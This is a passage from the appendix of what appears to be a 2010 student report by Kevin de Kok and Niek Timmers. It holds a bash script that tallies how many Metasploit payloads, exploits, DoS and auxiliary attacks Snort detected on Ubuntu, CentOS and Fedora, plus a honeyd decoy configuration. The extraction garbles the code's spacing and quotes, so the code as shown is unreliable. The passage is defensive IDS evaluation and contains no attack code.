’ ’ \12 and ubuntu <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘13 paverage=‘echo ” s c a l e =2; ” $pdetected ” / ” $pto ta l ” ∗ 100” | bc ‘14 #Set vars with database in fo about e xp l o i t s , t o ta l , de tec ted and avarage15 e t o t a l =‘echo −en ” s e l e c t COUNT( ubuntu ) from exp l o i t s where ubuntu <>

’ ’ ; ” \16 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘17 edetec ted=‘echo −en ” s e l e c t COUNT( ubuntu ) from exp l o i t s where ubuntu <>

’ ’18 and ubuntu <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘19 eaverage=‘echo ” s c a l e =2; ” $edetected ” / ” $ e t o t a l ” ∗ 100” | bc ‘20 #Set vars with database in fo about dos , t o ta l , de tec ted and avarage21 dto ta l =‘echo −en ” s e l e c t COUNT( ubuntu ) from dos where ubuntu <> ’ ’ ; ” \22 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘23 ddetected=‘echo −en ” s e l e c t COUNT( ubuntu ) from dos where ubuntu <> ’ ’ \24 and ubuntu <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘25 daverage=‘echo ” s c a l e =2; ” $ddetected ” / ” $dto ta l ” ∗ 100” | bc ‘26 #Set vars with database in fo about scanners , t o ta l , de tec ted and avarage27 a t o t a l =‘echo −en ” s e l e c t COUNT( ubuntu ) from aux i l i a r y where ubuntu <>

’ ’ ; ” \28 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘29 adetected=‘echo −en ” s e l e c t COUNT( ubuntu ) from aux i l i a r y where ubuntu

<> ’ ’ \30 and ubuntu <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘31 aaverage=‘echo ” s c a l e =2; ” $adetected ” / ” $a t o t a l ” ∗ 100” | bc ‘32

Kevin de KokNiek Timmers

May 30, 2010

M META-SNORT.SH 39

33 #se t t o t a l at tacks , de tec ted at tacks , and detec ted at tack by snort34 t o t a l a t t a c k s =‘expr $a to t a l + $pto ta l + $ e t o t a l + $dtota l ‘35 de t e c t eda t ta ck s =‘expr $adetected + $pdetected + $edetec ted + $ddetected ‘36 su c c e s sno r t =‘echo ” s c a l e =2; ” $de t e c t eda t tack s ” / ” $ t o t a l a t t a c k s ” ∗ 100”

| bc ‘3738 #Print the ca l cu l a t ed r e s u l t s39 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f payloads : ” $pto ta l40 echo −e ’\E[ 47 ; 3 5m’ ”## Detected payloads : ” $pdetected41 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng payloads : ”

$paverage ””42 echo ” ”43 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f e x p l o i t s : ” $ e t o t a l44 echo −e ’\E[ 47 ; 3 5m’ ”## Detected e xp l o i t s : ” $edetected45 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng e xp l o i t s : ”

$eaverage ””46 echo ” ”47 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f dos a t tacks : ” $dto ta l48 echo −e ’\E[ 47 ; 3 5m’ ”## Detected dos a t tacks : ” $ddetected49 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng payloads : ”

$daverage ””50 echo ” ”51 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f a u x i l i a r y at tacks : ” $a t o t a l52 echo −e ’\E[ 47 ; 3 5m’ ”## Detected payloads : ” $adetected53 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng aux i l i a r y at tacks :

” $aaverage ””54 echo −e ’\E[ 47 ; 3 5m’ ” \033[1m

############################################\033[0m”55 echo ” ”56 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f a t tacks : ” ” $ t o t a l a t t a c k s ”57 echo −e ’\E[ 47 ; 3 5m’ ”## Total detected at tacks : ” ” $de t e c t eda t tack s ”58 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng Metasp lo i t a t tacks

: ” $ succ e s sno r t ””59 echo −e ’\E[ 47 ; 3 5m’ ” \033[1m

############################################\033[0m”60 echo ” ”61 }6263 function centos {64 echo −e ’\E[ 47 ; 3 5m’ ” \033[1m###### Summary E f f e c t i v e n e s s o f Snort 2 . 8 . 6

######\033[0m”65 pto ta l =‘echo −en ” s e l e c t COUNT( centos ) from payloads where centos <>

’ ’ ; ”66 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘67 pdetected=‘echo −en ” s e l e c t COUNT( centos ) from payloads where centos <>

’ ’68 and centos <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘69 paverage=‘echo ” s c a l e =2; ” $pdetected ” / ” $pto ta l ” ∗ 100” | bc ‘7071 e t o t a l =‘echo −en ” s e l e c t COUNT( centos ) from exp l o i t s where centos <>

’ ’ ; ” \72 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘73 edetec ted=‘echo −en ” s e l e c t COUNT( centos ) from exp l o i t s where centos <>

’ ’ \74 and centos <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘75 eaverage=‘echo ” s c a l e =2; ” $edetected ” / ” $ e t o t a l ” ∗ 100” | bc ‘7677 dto ta l =‘echo −en ” s e l e c t COUNT( centos ) from dos where centos <> ’ ’ ; ” \78 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘79 ddetected=‘echo −en ” s e l e c t COUNT( centos ) from dos where centos <> ’ ’ \80 and centos <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘81 daverage=‘echo ” s c a l e =2; ” $ddetected ” / ” $dto ta l ” ∗ 100” | bc ‘8283 a t o t a l =‘echo −en ” s e l e c t COUNT( centos ) from aux i l i a r y where centos <>

’ ’ ; ” \

Kevin de KokNiek Timmers

May 30, 2010

M META-SNORT.SH 40

84 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘85 adetected=‘echo −en ” s e l e c t COUNT( centos ) from aux i l i a r y where centos

<> ’ ’86 and centos <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘87 aaverage=‘echo ” s c a l e =2; ” $adetected ” / ” $a t o t a l ” ∗ 100” | bc ‘8889 t o t a l a t t a c k s =‘expr $a to t a l + $pto ta l + $ e t o t a l + $dtota l ‘90 de t e c t eda t ta ck s =‘expr $adetected + $pdetected + $edetec ted + $ddetected ‘91 su c c e s sno r t =‘echo ” s c a l e =2; ” $de t e c t eda t tack s ” / ” $ t o t a l a t t a c k s ” ∗ 100”

| bc ‘9293 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f payloads : ” $pto ta l94 echo −e ’\E[ 47 ; 3 5m’ ”## Detected payloads : ” $pdetected95 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng payloads : ”

$paverage ””96 echo ” ”97 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f e x p l o i t s : ” $ e t o t a l98 echo −e ’\E[ 47 ; 3 5m’ ”## Detected e xp l o i t s : ” $edetected99 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng e xp l o i t s : ”

$eaverage ””100 echo ” ”101 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f dos a t tacks : ” $dto ta l102 echo −e ’\E[ 47 ; 3 5m’ ”## Detected dos a t tacks : ” $ddetected103 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng payloads : ”

$daverage ””104 echo ” ”105 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f a u x i l i a r y at tacks : ” $a t o t a l106 echo −e ’\E[ 47 ; 3 5m’ ”## Detected payloads : ” $adetected107 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng aux i l i a r y at tacks :

” $aaverage ””108 echo −e ’\E[ 47 ; 3 5m’ ” \033[1m

############################################\033[0m”109 echo ” ”110 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f a t tacks : ” ” $ t o t a l a t t a c k s ”111 echo −e ’\E[ 47 ; 3 5m’ ”## Total detected at tacks : ” ” $de t e c t eda t tack s ”112 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng Metasp lo i t a t tacks

: ” $ succ e s sno r t ””113 echo −e ’\E[ 47 ; 3 5m’ ” \033[1m

############################################\033[0m”114 echo ” ”115116 }117118 function f edora {119 echo −e ’\E[ 47 ; 3 5m’ ” \033[1m###### Summary E f f e c t i v e n e s s o f Snort 2 . 8 . 6 +

ET ######\033[0m”120 pto ta l =‘echo −en ” s e l e c t COUNT( fedora ) from payloads where f edora <>

’ ’ ; ” \121 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘122 pdetected=‘echo −en ” s e l e c t COUNT( fedora ) from payloads where f edora <>

’ ’ \123 and fedora <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘124 paverage=‘echo ” s c a l e =2; ” $pdetected ” / ” $pto ta l ” ∗ 100” | bc ‘125126 e t o t a l =‘echo −en ” s e l e c t COUNT( fedora ) from exp l o i t s where f edora <>

’ ’ ; ” \127 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘128 edetec ted=‘echo −en ” s e l e c t COUNT( fedora ) from exp l o i t s where f edora <>

’ ’ \129 and fedora <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘130 eaverage=‘echo ” s c a l e =2; ” $edetected ” / ” $ e t o t a l ” ∗ 100” | bc ‘131132 dto ta l =‘echo −en ” s e l e c t COUNT( fedora ) from dos where f edora <> ’ ’ ; ” \133 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘134 ddetected=‘echo −en ” s e l e c t COUNT( fedora ) from dos where f edora <> ’ ’135 and fedora <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘

Kevin de KokNiek Timmers

May 30, 2010

N HONEYD.CONF 41

136 daverage=‘echo ” s c a l e =2; ” $ddetected ” / ” $dto ta l ” ∗ 100” | bc‘

137138 a t o t a l =‘echo −en ” s e l e c t COUNT( fedora ) from aux i l i a r y where f edora <>

’ ’ ; ” \139 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘140 adetected=‘echo −en ” s e l e c t COUNT( fedora ) from aux i l i a r y where f edora

<> ’ ’ \141 and fedora <> ’NOT DETECTED ’ ; ” | mysql auth | sed ’ s /ˆC.∗ ) // ’

‘142 aaverage=‘echo ” s c a l e =2; ” $adetected ” / ” $a t o t a l ” ∗ 100” | bc ‘143144 #Set vars to ca l cu l a t e t o t a l average of a t tacks145 t o t a l a t t a c k s =‘expr $a to t a l + $pto ta l + $ e t o t a l + $dtota l ‘146 de t e c t eda t ta ck s =‘expr $adetected + $pdetected + $edetec ted + $ddetected ‘147 su c c e s sno r t =‘echo ” s c a l e =2; ” $de t e c t eda t tack s ” / ” $ t o t a l a t t a c k s ” ∗ 100”

| bc ‘148149 #Print the in fo from the predef ined vars150 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f payloads : ” $pto ta l151 echo −e ’\E[ 47 ; 3 5m’ ”## Detected payloads : ” $pdetected152 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng payloads : ”

$paverage ””153 echo ” ”154 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f e x p l o i t s : ” $ e t o t a l155 echo −e ’\E[ 47 ; 3 5m’ ”## Detected e xp l o i t s : ” $edetected156 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng e xp l o i t s : ”

$eaverage ””157 echo ” ”158 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f dos a t tacks : ” $dto ta l159 echo −e ’\E[ 47 ; 3 5m’ ”## Detected dos a t tacks : ” $ddetected160 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng payloads : ”

$daverage ””161 echo ” ”162 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f a u x i l i a r y at tacks : ” $a t o t a l163 echo −e ’\E[ 47 ; 3 5m’ ”## Detected payloads : ” $adetected164 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng aux i l i a r y at tacks :

” $aaverage ””165 echo −e ’\E[ 47 ; 3 5m’ ” \033[1m

############################################\033[0m”166 echo ” ”167 echo −e ’\E[ 47 ; 3 5m’ ”## Total amount o f a t tacks : ” ” $ t o t a l a t t a c k s ”168 echo −e ’\E[ 47 ; 3 5m’ ”## Total detected at tacks : ” ” $de t e c t eda t tack s ”169 echo −e ’\E[ 47 ; 3 5m’ ”## Succes ra t e o f Snort de t e c t i ng Metasp lo i t a t tacks

: ” $ succ e s sno r t ””170 echo −e ’\E[ 47 ; 3 5m’ ” \033[1m

############################################\033[0m”171 echo ” ”172173 }174175 #Execute funct ions176 ubuntu177 centos178 f edora

N honeyd.conf

1 c r e a t e windows2 set windows p e r s ona l i t y ” Microso f t Windows 2000 SP3”3 set windows default tcp ac t i on r e s e t4 set windows default udp act i on r e s e t5 add windows tcp port 1 open6 add windows udp port 1 open

Kevin de KokNiek Timmers

May 30, 2010

N HONEYD.CONF 42

7 add windows tcp port 65535 open8 add windows udp port 65535 open9 bind ip windows

Kevin de KokNiek Timmers

May 30, 2010